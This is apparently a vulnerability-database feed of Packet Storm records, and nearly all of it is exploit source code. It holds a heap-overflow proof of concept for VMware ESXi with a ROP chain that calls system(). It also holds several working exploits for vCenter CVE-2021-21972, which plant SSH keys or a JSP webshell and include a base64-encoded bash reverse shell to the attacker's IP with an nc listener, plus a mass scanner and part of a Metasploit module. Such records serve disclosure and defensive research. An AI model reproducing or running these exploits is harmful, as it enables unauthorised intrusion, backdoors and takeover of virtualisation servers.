\nrequests[24].put(block(0x810)) \nrequests[23].put(close()) \nrequests[25].put(connect()) \nrequests[25].put(block(0x698)) \n \nrequests[27].put(connect()) \nrequests[28].put(connect()) \n \nrequests[24].put(close()) \nrequests[26].put(connect()) \nrequests[26].put(overflow_and_extend(0x130, 0x1)) \nrequests[27].put(update_target_send_buffer(0x130, 0x598, 0x1, libc_leak_location, 0x4)) \nrequests[29].put(connect()) \nrequests[29].put(block(0x178)) \n \nrequests[22].put(close()) \nrequests[30].put(connect()) \nrequests[30].put(overflow_and_extend(0x140, 0x1)) \nfd = 0x15 \nrequests[28].put(update_target_slpdsocket(fd, 0x140, STREAM_WRITE)) \nrequests[28].put(update_target_slpdsocket(LISTEN_FD, 0x140, LISTEN)) \nrequests[31].put(connect()) \nrequests[31].put(block(0x178)) \nrequests[25].put(leak_data(0x4)) \n \ntime.sleep(T + 1.0) \nlibc_base_address = struct.unpack('<I', leaked_data)[0] - 0x193568 \n \nlibc_ret_offset = 0x0008009c \nlibc_system_offset = 0x0003e390 \nlibc_environ_offset = 0x00194e20 \nlibc___free_hook_offset = 0x001948d8 \nlibc_ret_address = libc_base_address + libc_ret_offset \nlibc_system_address = libc_base_address + libc_system_offset \nlibc_environ_address = libc_base_address + libc_environ_offset \nlibc___free_hook_address = libc_base_address + libc___free_hook_offset \nshell_cmd_address = heap_address + 0x34 \n \ngadget_offset = 0x0007fe01 # add esp, 0x100 ; ret \ngadget_address = libc_base_address + gadget_offset \n \nrequests[27].put(update_target_send_buffer(0x130, 0x598, 0x1, libc_environ_address, 0x4)) \nrequests[28].put(update_target_slpdsocket(fd, 0x140, STREAM_WRITE)) \nrequests[25].put(leak_data(0x4)) \n \ntime.sleep(T + 1.0) \nstack_environ_address = struct.unpack('<I', leaked_data)[0] \nesp_offset = 0xe30 if sys.argv[2] == '1' else 0xe7c \nesp_value = stack_environ_address - esp_offset \npivoted_esp_value = esp_value + 0x100 \n \nprint() \nprint('[+] libc base address: ', hex(libc_base_address)) \nprint(\"[+] libc system address: \", hex(libc_system_address)) \nprint(\"[+] libc environ address: \", hex(libc_environ_address)) \nprint(\"[+] libc __free_hook address: \", hex(libc___free_hook_address)) \nprint(\"[+] ret address: \", hex(libc_ret_address)) \nprint(\"[+] gadget address: \", hex(gadget_address)) \nprint('[+] heap address: ', hex(heap_address)) \nprint(\"[+] shell command address: \", hex(shell_cmd_address)) \nprint(\"[+] stack enviorn address: \", hex(stack_environ_address)) \nprint(\"[+] esp value: \", hex(esp_value)) \nprint(\"[+] pivoted esp value: \", hex(pivoted_esp_value)) \nprint() \n \nrequests[28].put(update_target_slpdsocket(LISTEN_FD, 0x140, LISTEN)) \n \nrequests[32].put(connect()) \nrequests[32].put(block(0x810)) \nrequests[33].put(connect()) \nrequests[34].put(connect()) \nrequests[34].put(block(0x810)) \nrequests[33].put(block(0x100)) \n \nrequests[35].put(connect()) \nrequests[36].put(connect()) \n \nrequests[34].put(close()) \nrequests[37].put(connect()) \nrequests[37].put(overflow_and_extend(0x120, 0x3)) \nrequests[36].put(update_target_recv_buffer(0x4, shell_cmd_address)) \nrequests[38].put(connect()) \nrequests[38].put(block(0x178)) \n \nrequests[32].put(close()) \nrequests[39].put(connect()) \nrequests[39].put(overflow_and_extend(0x140, 0x1)) \nrequests[35].put(update_target_slpdsocket(LISTEN_FD, 0x140, LISTEN)) \nrequests[40].put(connect()) \nrequests[40].put(block(0x178)) \n \nfd = 0x1a \npayload = shell_cmd + b'\\x00' \nrequests[36].put(update_target_recv_buffer(len(payload), shell_cmd_address)) \nrequests[35].put(update_target_slpdsocket(fd, 0x140, STREAM_READ)) \nrequests[33].put(service_request(payload)) \n \npayload = struct.pack('<I', libc_ret_address) * 10 + struct.pack('<I', libc_system_address) + b'\\x41' * 4 + struct.pack('<I', shell_cmd_address) \nrequests[36].put(update_target_recv_buffer(len(payload), pivoted_esp_value - 0x10)) \nrequests[35].put(update_target_slpdsocket(fd, 0x140, STREAM_READ)) \nrequests[33].put(service_request(payload)) \n \n#breakpoint() \n \npayload = b'\\x41\\x41\\x41\\x41' if DEBUG == True else struct.pack('<I', gadget_address) \nrequests[36].put(update_target_recv_buffer(len(payload), libc___free_hook_address)) \nrequests[35].put(update_target_slpdsocket(fd, 0x140, STREAM_READ)) \nrequests[33].put(service_request(payload)) \n \ntime.sleep(T + 1.0) \nprint('[*] exploit deployed') \nreturn 0 \n \ndef intro(): \nprint(\" _____ _____ ___ __ ___ _ ___ _ ___ ____ _ _ \") \nprint(\" / __\\ \\ / / __|_|_ ) \\_ ) |__|_ ) / _ \\__ | | | \") \nprint(\" | (__ \\ V /| _|___/ / () / /| |___/ /| \\_, / / /|_ _| \") \nprint(\" \\___| \\_/ |___| /___\\__/___|_| /___|_|/_/ /_/ |_| \") \nprint() \nprint(\" PoC Exploit \") \nprint() \nprint(\" vuln discovered by: Lucas Leong (@_wmliang_) \") \nprint(\" poc by: Johnny Yu (@straight_blast) \") \nprint(\" \") \nprint() \nprint(\" currently support the following: \") \nprint(\" [1] VMware ESXi 6.7.0 build-14320388 \") \nprint(\" [2] VMware ESXi 6.7.0 build-16316930 \") \nprint() \n \nif __name__ == '__main__': \nintro() \nexploit() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162957/vmware-heapoverflow.txt", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-01T16:09:17", "description": "", "cvss3": {}, "published": "2021-03-01T00:00:00", "type": "packetstorm", "title": "VMware vCenter Server 7.0 Arbitrary File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-01T00:00:00", "id": "PACKETSTORM:161590", "href": "https://packetstormsecurity.com/files/161590/VMware-vCenter-Server-7.0-Arbitrary-File-Upload.html", "sourceData": "`# Exploit Title: VMware vCenter Server 7.0 - Unauthenticated File Upload \n# Date: 2021-02-27 \n# Exploit Author: Photubias \n# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2021-0002.html \n# Version: vCenter Server 6.5 (7515524<[vulnerable]<17590285), vCenter Server 6.7 (<17138064) and vCenter Server 7 (<17327517) \n# Tested on: vCenter Server Appliance 6.5, 6.7 & 7.0, multiple builds \n# CVE: CVE-2021-21972 \n \n#!/usr/bin/env python3 \n''' \nCopyright 2021 Photubias(c) \nThis program is free software: you can redistribute it and/or modify \nit under the terms of the GNU General Public License as published by \nthe Free Software Foundation, either version 3 of the License, or \n(at your option) any later version. \n \nThis program is distributed in the hope that it will be useful, \nbut WITHOUT ANY WARRANTY; without even the implied warranty of \nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \nGNU General Public License for more details. \n \nYou should have received a copy of the GNU General Public License \nalong with this program. If not, see <http://www.gnu.org/licenses/>. \n \nFile name CVE-2021-21972.py \nwritten by tijl[dot]deneut[at]howest[dot]be for www.ic4.be \n \nCVE-2021-21972 is an unauthenticated file upload and overwrite, \nexploitation can be done via SSH public key upload or a webshell \nThe webshell must be of type JSP, and its success depends heavily on the specific vCenter version \n \n# Manual verification: https://<ip>/ui/vropspluginui/rest/services/checkmobregister \n# A white page means vulnerable \n# A 401 Unauthorized message means patched or workaround implemented (or the system is not completely booted yet) \n# Notes: \n# * On Linux SSH key upload is always best, when SSH access is possible & enabled \n# * On Linux the upload is done as user vsphere-ui:users \n# * On Windows the upload is done as system user \n# * vCenter 6.5 <=7515524 does not contain the vulnerable component \"vropspluginui\" \n# * vCenter 6.7U2 and up are running the Webserver in memory, so backdoor the system (active after reboot) or use SSH payload \n \nThis is a native implementation without requirements, written in Python 3. \nWorks equally well on Windows as Linux (as MacOS, probably ;-) \n \nFeatures: vulnerability checker + exploit \n''' \n \nimport os, tarfile, sys, optparse, requests \nrequests.packages.urllib3.disable_warnings() \n \nlProxy = {} \nSM_TEMPLATE = b'''<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"> \n<env:Body> \n<RetrieveServiceContent xmlns=\"urn:vim25\"> \n<_this type=\"ServiceInstance\">ServiceInstance</_this> \n</RetrieveServiceContent> \n</env:Body> \n</env:Envelope>''' \nsURL = sFile = sRpath = sType = None \n \ndef parseArguments(options): \nglobal sURL, sFile, sType, sRpath, lProxy \nif not options.url or not options.file: exit('[-] Error: please provide at least an URL and a FILE to upload.') \nsURL = options.url \nif sURL[-1:] == '/': sURL = sURL[:-1] \nif not sURL[:4].lower() == 'http': sURL = 'https://' + sURL \nsFile = options.file \nif not os.path.exists(sFile): exit('[-] File not found: ' + sFile) \nsType = 'ssh' \nif options.type: sType = options.type \nif options.rpath: sRpath = options.rpath \nelse: sRpath = None \nif options.proxy: lProxy = {'https': options.proxy} \n \ndef getVersion(sURL): \ndef getValue(sResponse, sTag = 'vendor'): \ntry: return sResponse.split('<' + sTag + '>')[1].split('</' + sTag + '>')[0] \nexcept: pass \nreturn '' \noResponse = requests.post(sURL + '/sdk', verify = False, proxies = lProxy, timeout = 5, data = SM_TEMPLATE) \n#print(oResponse.text) \nif oResponse.status_code == 200: \nsResult = oResponse.text \nif not 'VMware' in getValue(sResult, 'vendor'): \nexit('[-] Not a VMware system: ' + sURL) \nelse: \nsName = getValue(sResult, 'name') \nsVersion = getValue(sResult, 'version') # e.g. 7.0.0 \nsBuild = getValue(sResult, 'build') # e.g. 15934073 \nsFull = getValue(sResult, 'fullName') \nprint('[+] Identified: ' + sFull) \nreturn sVersion, sBuild \nexit('[-] Not a VMware system: ' + sURL) \n \ndef verify(sURL): \n#return True \nsURL += '/ui/vropspluginui/rest/services/uploadova' \ntry: \noResponse = requests.get(sURL, verify=False, proxies = lProxy, timeout = 5) \nexcept: \nexit('[-] System not available: ' + sURL) \nif oResponse.status_code == 405: return True ## A patched system returns 401, but also if it is not booted completely \nelse: return False \n \ndef createTarLin(sFile, sType, sVersion, sBuild, sRpath = None): \ndef getResourcePath(): \noResponse = requests.get(sURL + '/ui', verify = False, proxies = lProxy, timeout = 5) \nreturn oResponse.text.split('static/')[1].split('/')[0] \noTar = tarfile.open('payloadLin.tar','w') \nif sRpath: ## version & build not important \nif sRpath[0] == '/': sRpath = sRpath[1:] \nsPayloadPath = '../../' + sRpath \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \nreturn 'absolute' \nelif sType.lower() == 'ssh': ## version & build not important \nsPayloadPath = '../../home/vsphere-ui/.ssh/authorized_keys' \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \nreturn 'ssh' \nelif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 5) or (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) < 13010631): \n## vCenter 6.5/6.7 < 13010631, just this location with a subnumber \nsPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/%d/0/h5ngc.war/resources/' + os.path.basename(sFile) \nprint('[!] Selected uploadpath: ' + sPayloadPath[5:]) \nfor i in range(112): oTar.add(sFile, arcname=sPayloadPath % i) \noTar.close() \nreturn 'webshell' \nelif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) >= 13010631): \n## vCenter 6.7 >= 13010631, webshell not an option, but backdoor works when put at /usr/lib/vmware-vsphere-ui/server/static/resources/libs/<thefile> \nsPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/resources/libs/' + os.path.basename(sFile) \nprint('[!] Selected uploadpath: ' + sPayloadPath[5:]) \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \nreturn 'backdoor' \nelse: #(int(sVersion.split('.')[0]) == 7 and int(sVersion.split('.')[1]) == 0): \n## vCenter 7.0, backdoor webshell, but dynamic location (/usr/lib/vmware-vsphere-ui/server/static/resources15863815/libs/<thefile>) \nsPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/' + getResourcePath() + '/libs/' + os.path.basename(sFile) \nprint('[!] Selected uploadpath: ' + sPayloadPath[5:]) \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \nreturn 'backdoor' \n \n \ndef createTarWin(sFile, sRpath = None): \n## vCenter only (uploaded as administrator), vCenter 7+ did not exist for Windows \nif sRpath: \nif sRpath[0] == '/': sRpath = sRpath[:1] \nsPayloadPath = '../../' + sRpath \nelse: \nsPayloadPath = '../../ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/' + os.path.basename(sFile) \noTar = tarfile.open('payloadWin.tar','w') \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \n \ndef uploadFile(sURL, sUploadType, sFile): \n#print('[!] Uploading ' + sFile) \nsFile = os.path.basename(sFile) \nsUploadURL = sURL + '/ui/vropspluginui/rest/services/uploadova' \narrLinFiles = {'uploadFile': ('1.tar', open('payloadLin.tar', 'rb'), 'application/octet-stream')} \n## Linux \noResponse = requests.post(sUploadURL, files = arrLinFiles, verify = False, proxies = lProxy) \nif oResponse.status_code == 200: \nif oResponse.text == 'SUCCESS': \nprint('[+] Linux payload uploaded succesfully.') \nif sUploadType == 'ssh': \nprint('[+] SSH key installed for user \\'vsphere-ui\\'.') \nprint(' Please run \\'ssh vsphere-ui@' + sURL.replace('https://','') + '\\'') \nreturn True \nelif sUploadType == 'webshell': \nsWebshell = sURL + '/ui/resources/' + sFile \n#print('testing ' + sWebshell) \noResponse = requests.get(sWebshell, verify=False, proxies = lProxy) \nif oResponse.status_code != 404: \nprint('[+] Webshell verified, please visit: ' + sWebshell) \nreturn True \nelif sUploadType == 'backdoor': \nsWebshell = sURL + '/ui/resources/' + sFile \nprint('[+] Backdoor ready, please reboot or wait for a reboot') \nprint(' then open: ' + sWebshell) \nelse: ## absolute \npass \n## Windows \narrWinFiles = {'uploadFile': ('1.tar', open('payloadWin.tar', 'rb'), 'application/octet-stream')} \noResponse = requests.post(sUploadURL, files=arrWinFiles, verify = False, proxies = lProxy) \nif oResponse.status_code == 200: \nif oResponse.text == 'SUCCESS': \nprint('[+] Windows payload uploaded succesfully.') \nif sUploadType == 'backdoor': \nprint('[+] Absolute upload looks OK') \nreturn True \nelse: \nsWebshell = sURL + '/statsreport/' + sFile \noResponse = requests.get(sWebshell, verify=False, proxies = lProxy) \nif oResponse.status_code != 404: \nprint('[+] Webshell verified, please visit: ' + sWebshell) \nreturn True \nreturn False \n \nif __name__ == \"__main__\": \nusage = ( \n'Usage: %prog [option]\\n' \n'Exploiting Windows & Linux vCenter Server\\n' \n'Create SSH keys: ssh-keygen -t rsa -f id_rsa -q -N \\'\\'\\n' \n'Note1: Since the 6.7U2+ (b13010631) Linux appliance, the webserver is in memory. Webshells only work after reboot\\n' \n'Note2: Windows is the most vulnerable, but less mostly deprecated anyway') \n \nparser = optparse.OptionParser(usage=usage) \nparser.add_option('--url', '-u', dest='url', help='Required; example https://192.168.0.1') \nparser.add_option('--file', '-f', dest='file', help='Required; file to upload: e.g. id_rsa.pub in case of ssh or webshell.jsp in case of webshell') \nparser.add_option('--type', '-t', dest='type', help='Optional; ssh/webshell, default: ssh') \nparser.add_option('--rpath', '-r', dest='rpath', help='Optional; specify absolute remote path, e.g. /tmp/testfile or /Windows/testfile') \nparser.add_option('--proxy', '-p', dest='proxy', help='Optional; configure a HTTPS proxy, e.g. http://127.0.0.1:8080') \n \n(options, args) = parser.parse_args() \n \nparseArguments(options) \n \n## Verify \nif verify(sURL): print('[+] Target vulnerable: ' + sURL) \nelse: exit('[-] Target not vulnerable: ' + sURL) \n \n## Read out the version \nsVersion, sBuild = getVersion(sURL) \nif sRpath: print('[!] Ready to upload your file to ' + sRpath) \nelif sType.lower() == 'ssh': print('[!] Ready to upload your SSH keyfile \\'' + sFile + '\\'') \nelse: print('[!] Ready to upload webshell \\'' + sFile + '\\'') \nsAns = input('[?] Want to exploit? [y/N]: ') \nif not sAns or not sAns[0].lower() == 'y': exit() \n \n## Create TAR file \nsUploadType = createTarLin(sFile, sType, sVersion, sBuild, sRpath) \nif not sUploadType == 'ssh': createTarWin(sFile, sRpath) \n \n## Upload and verify \nuploadFile(sURL, sUploadType, sFile) \n \n## Cleanup \nos.remove('payloadLin.tar') \nos.remove('payloadWin.tar') \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/161590/vmwarevcenterserver70-upload.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-24T15:05:40", "description": "", "cvss3": {}, "published": "2021-02-24T00:00:00", "type": "packetstorm", "title": "VMware vCenter 6.5 / 7.0 Remote Code Execution Proof Of Concept", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21972"], "modified": "2021-02-24T00:00:00", "id": "PACKETSTORM:161527", "href": "https://packetstormsecurity.com/files/161527/VMware-vCenter-6.5-7.0-Remote-Code-Execution-Proof-Of-Concept.html", "sourceData": "`#-*- coding:utf-8 -*- \nbanner = \"\"\" \n888888ba dP \n88 `8b 88 \na88aaaa8P' .d8888b. d8888P .d8888b. dP dP \n88 `8b. 88' `88 88 Y8ooooo. 88 88 \n88 .88 88. .88 88 88 88. .88 \n88888888P `88888P8 dP `88888P' `88888P' \nooooooooooooooooooooooooooooooooooooooooooooooooooooo \n@time:2021/02/24 CVE-2021-21972.py \nC0de by NebulabdSec - @batsu \n\"\"\" \nprint(banner) \n \nimport threadpool \nimport random \nimport requests \nimport argparse \nimport http.client \nimport urllib3 \n \nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) \nhttp.client.HTTPConnection._http_vsn = 10 \nhttp.client.HTTPConnection._http_vsn_str = 'HTTP/1.0' \n \nTARGET_URI = \"/ui/vropspluginui/rest/services/uploadova\" \n \ndef get_ua(): \nfirst_num = random.randint(55, 62) \nthird_num = random.randint(0, 3200) \nfourth_num = random.randint(0, 140) \nos_type = [ \n'(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)', \n'(Macintosh; Intel Mac OS X 10_12_6)' \n] \nchrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) \n \nua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', \n'(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] \n) \nreturn ua \n \ndef CVE_2021_21972(url): \nproxies = {\"scoks5\": \"http://127.0.0.1:1081\"} \nheaders = { \n'User-Agent': get_ua(), \n\"Content-Type\": \"application/x-www-form-urlencoded\" \n} \ntargetUrl = url + TARGET_URI \ntry: \nres = requests.get(targetUrl, \nheaders=headers, \ntimeout=15, \nverify=False, \nproxies=proxies) \n# proxies={'socks5': 'http://127.0.0.1:1081'}) \n# print(len(res.text)) \nif res.status_code == 405: \nprint(\"[+] URL:{}--------\u5b58\u5728CVE-2021-21972\u6f0f\u6d1e\".format(url)) \n# print(\"[+] Command success result: \" + res.text + \"\\n\") \nwith open(\"\u5b58\u5728\u6f0f\u6d1e\u5730\u5740.txt\", 'a') as fw: \nfw.write(url + '\\n') \nelse: \nprint(\"[-] \" + url + \" \u6ca1\u6709\u53d1\u73b0CVE-2021-21972\u6f0f\u6d1e.\\n\") \n# except Exception as e: \n# print(e) \nexcept: \nprint(\"[-] \" + url + \" Request ERROR.\\n\") \ndef multithreading(filename, pools=5): \nworks = [] \nwith open(filename, \"r\") as f: \nfor i in f: \nfunc_params = [i.rstrip(\"\\n\")] \n# func_params = [i] + [cmd] \nworks.append((func_params, None)) \npool = threadpool.ThreadPool(pools) \nreqs = threadpool.makeRequests(CVE_2021_21972, works) \n[pool.putRequest(req) for req in reqs] \npool.wait() \n \ndef main(): \nparser = argparse.ArgumentParser() \nparser.add_argument(\"-u\", \n\"--url\", \nhelp=\"Target URL; Example:http://ip:port\") \nparser.add_argument(\"-f\", \n\"--file\", \nhelp=\"Url File; Example:url.txt\") \n# parser.add_argument(\"-c\", \"--cmd\", help=\"Commands to be executed; \") \nargs = parser.parse_args() \nurl = args.url \n# cmd = args.cmd \nfile_path = args.file \nif url != None and file_path ==None: \nCVE_2021_21972(url) \nelif url == None and file_path != None: \nmultithreading(file_path, 10) # \u9ed8\u8ba415\u7ebf\u7a0b \n \nif __name__ == \"__main__\": \nmain() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/161527/CVE-2021-21972.py.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-06-24T18:30:50", "description": "", "cvss3": {}, "published": "2021-06-24T00:00:00", "type": "packetstorm", "title": "VMware vCenter 6.5 / 6.7 / 7.0 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21972"], "modified": "2021-06-24T00:00:00", "id": "PACKETSTORM:163268", "href": "https://packetstormsecurity.com/files/163268/VMware-vCenter-6.5-6.7-7.0-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated) \n# Date: 06/21/2021 \n# Exploit Author: CHackA0101 \n# Vendor Homepage: https://kb.vmware.com/s/article/82374 \n# Software Link: https://www.vmware.com/products/vcenter-server.html \n# Version: This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2). \n# Tested on: VMware vCenter version 6.5 (OS: Linux 4.4.182-1.ph1 SMP UTC 2019 x86_64 GNU/Linux) \n# CVE: 2021-21972 \n \n# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2021-21972/README.md \n \n#!/usr/bin/python2 \n \nimport os \nimport urllib3 \nimport argparse \nimport sys \nimport requests \nimport base64 \nimport tarfile \nimport threading \nimport time \n \nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) \n \nmyargs=argparse.ArgumentParser() \nmyargs.add_argument('-T','--target',help='The IP address of the target',required=True) \nmyargs.add_argument('-L','--local',help='Your local IP',required=True) \nargs=myargs.parse_args() \n \ndef getprompt(x): \nprint (\"(CHackA0101-GNU/Linux)$ \"+ str(x)) \n \ndef getpath(path=\"/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/37/0/h5ngc.war/resources/shell4.jsp\"): \nfullpath=\"../\" * 7 + path \nreturn fullpath.replace('\\\\','/').replace('//','/') \n \ndef createbackdoor(localip): \n# shell4.jsp \nbackdoor = \"PGZvcm0gbWV0aG9kPSJHRVQiIGFjdGlvbj0iIj4KCTxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjbWQiIC8+Cgk8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRXhlYyEiIC8+CjwvZm9ybT4gPCUhCnB1YmxpYyBTdHJpbmcgZXNjKFN0cmluZyBzdHIpewoJU3RyaW5nQnVmZmVyIHNiID0gbmV3IFN0cmluZ0J1ZmZlcigpOwoJZm9yKGNoYXIgYyA6IHN0ci50b0NoYXJBcnJheSgpKQoJCWlmKCBjID49ICcwJyAmJiBjIDw9ICc5JyB8fCBjID49ICdBJyAmJiBjIDw9ICdaJyB8fCBjID49ICdhJyAmJiBjIDw9ICd6JyB8fCBjID09ICcgJyApCgkJCXNiLmFwcGVuZCggYyApOwoJCWVsc2UKCQkJc2IuYXBwZW5kKCImIyIrKGludCkoYyYweGZmKSsiOyIpOwoJcmV0dXJuIHNiLnRvU3RyaW5nKCk7Cn0gJT48JQpTdHJpbmcgY21kID0gcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpOwppZiAoIGNtZCAhPSBudWxsKSB7CglvdXQucHJpbnRsbigiPHByZT5Db21tYW5kIHdhczogPGI+Iitlc2MoY21kKSsiPC9iPlxuIik7CglqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbSBpbiA9IG5ldyBqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbShSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGNtZCkuZ2V0SW5wdXRTdHJlYW0oKSk7CglTdHJpbmcgbGluZSA9IGluLnJlYWRMaW5lKCk7Cgl3aGlsZSggbGluZSAhPSBudWxsICl7CgkJb3V0LnByaW50bG4oZXNjKGxpbmUpKTsKCQlsaW5lID0gaW4ucmVhZExpbmUoKTsKCX0KCW91dC5wcmludGxuKCI8L3ByZT4iKTsKfSAlPg==\" \nbackdoor = base64.b64decode(backdoor).decode('utf-8') \nf = open(\"shell4.jsp\",\"w\") \nf.write(backdoor) \nf.close() \n# reverse.sh \n# After decoding overwrite string 'CUSTOM_IP' for local IP \nshell=\"IyEvYmluL2Jhc2gKYmFzaCAtaSA+JiAvZGV2L3RjcC9DVVNUT01fSVAvNDQzIDA+JjE=\" \nshell=base64.b64decode(shell).decode('utf-8') \nshell=shell.replace('CUSTOM_IP',localip) \nf=open(\"reverse.sh\",\"w\") \nf.write(shell) \nf.close() \n# Move on with the payload \npayload_file=tarfile.open('payload.tar','w') \nmyroute=getpath() \ngetprompt('Adding web backdoor to archive') \npayload_file.add(\"shell4.jsp\", myroute) \nmyroute=getpath(\"tmp/reverse.sh\") \ngetprompt('Adding bash backdoor to archive') \npayload_file.add(\"reverse.sh\", myroute) \npayload_file.close() \n# cleaning up a little bit \nos.unlink(\"reverse.sh\") \nos.unlink(\"shell4.jsp\") \ngetprompt('Backdoor file just was created.') \n \ndef launchexploit(ip): \nres=requests.post('https://' + ip + '/ui/vropspluginui/rest/services/uploadova', files={'uploadFile':open('payload.tar', 'rb')}, verify=False, timeout=60) \nif res.status_code == 200 and res.text == 'SUCCESS': \ngetprompt('Backdoor was uploaded successfully!') \nreturn True \nelse: \ngetprompt('Backdoor failed to be uploaded. Target denied access.') \nreturn False \n \ndef testshell(ip): \ngetprompt('Looking for shell...') \nshell_path=\"/ui/resources/shell4.jsp?cmd=uname+-a\" \nres=requests.get('https://' + ip + shell_path, verify=False, timeout=60) \nif res.status_code==200: \ngetprompt('Shell was found!.') \nresponse=res.text \nif True: \ngetprompt('Shell is responsive.') \ntry: \nresponse=re.findall(\"b>(.+)</\",response)[0] \nprint('$>uname -a') \nprint(response) \nexcept: \npass \nreturn True \nelse: \ngetprompt('Sorry. Shell was not found.') \nreturn False \n \ndef opendoor(url): \ntime.sleep(3) \ngetprompt('Executing command.') \nrequests.get(url, verify=False, timeout=1800) \n \ndef executebackdoor(ip, localip): \nurl=\"https://\"+ip+\"/ui/resources/shell4.jsp?cmd=bash%20/tmp/reverse.sh\" \nt=threading.Thread(target=opendoor,args=(url,)) \nt.start() \ngetprompt('Setting up socket '+localip+':443') \nos.system('nc -lnvp 443') \n \nif len(sys.argv)== 1: \nmyargs.print_help(sys.stderr) \nsys.exit(1) \ncreatebackdoor(args.local) \nuploaded=launchexploit(args.target) \nif uploaded: \ntested=testshell(args.target) \nif tested: \nexecutebackdoor(args.target, args.local) \ngetprompt(\"Execution completed!\") \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163268/vmwarevcenter70-exec.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-08T16:24:36", "description": "", "cvss3": {}, "published": "2021-03-08T00:00:00", "type": "packetstorm", "title": "VMware vCenter Server File Upload / Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-08T00:00:00", "id": "PACKETSTORM:161695", "href": "https://packetstormsecurity.com/files/161695/VMware-vCenter-Server-File-Upload-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \n# \"Shotgun\" approach to writing JSP \nRank = ManualRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::CheckModule \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'VMware vCenter Server Unauthenticated OVA File Upload RCE', \n'Description' => %q{ \nThis module exploits an unauthenticated OVA file upload and path \ntraversal in VMware vCenter Server to write a JSP payload to a \nweb-accessible directory. \n \nFixed versions are 6.5 Update 3n, 6.7 Update 3l, and 7.0 Update 1c. \nNote that later vulnerable versions of the Linux appliance aren't \nexploitable via the webshell technique. Furthermore, writing an SSH \npublic key to /home/vsphere-ui/.ssh/authorized_keys works, but the \nuser's non-existent password expires 90 days after install, rendering \nthe technique nearly useless against production environments. \n \nYou'll have the best luck targeting older versions of the Linux \nappliance. The Windows target should work ubiquitously. \n}, \n'Author' => [ \n'Mikhail Klyuchnikov', # Discovery \n'wvu', # Analysis and exploit \n'mr_me', # Co-conspirator \n'Viss' # Co-conspirator \n], \n'References' => [ \n['CVE', '2021-21972'], \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0002.html'], \n['URL', 'https://swarm.ptsecurity.com/unauth-rce-vmware/'], \n['URL', 'https://twitter.com/jas502n/status/1364810720261496843'], \n['URL', 'https://twitter.com/_0xf4n9x_/status/1364905040876503045'], \n['URL', 'https://twitter.com/HackingLZ/status/1364636303606886403'], \n['URL', 'https://kb.vmware.com/s/article/2143838'], \n['URL', 'https://nmap.org/nsedoc/scripts/vmware-version.html'] \n], \n'DisclosureDate' => '2021-02-23', # Vendor advisory \n'License' => MSF_LICENSE, \n'Platform' => ['linux', 'win'], \n'Arch' => ARCH_JAVA, \n'Privileged' => false, # true on Windows \n'Targets' => [ \n[ \n# TODO: /home/vsphere-ui/.ssh/authorized_keys \n'VMware vCenter Server <= 6.7 Update 1b (Linux)', \n{ \n'Platform' => 'linux' \n} 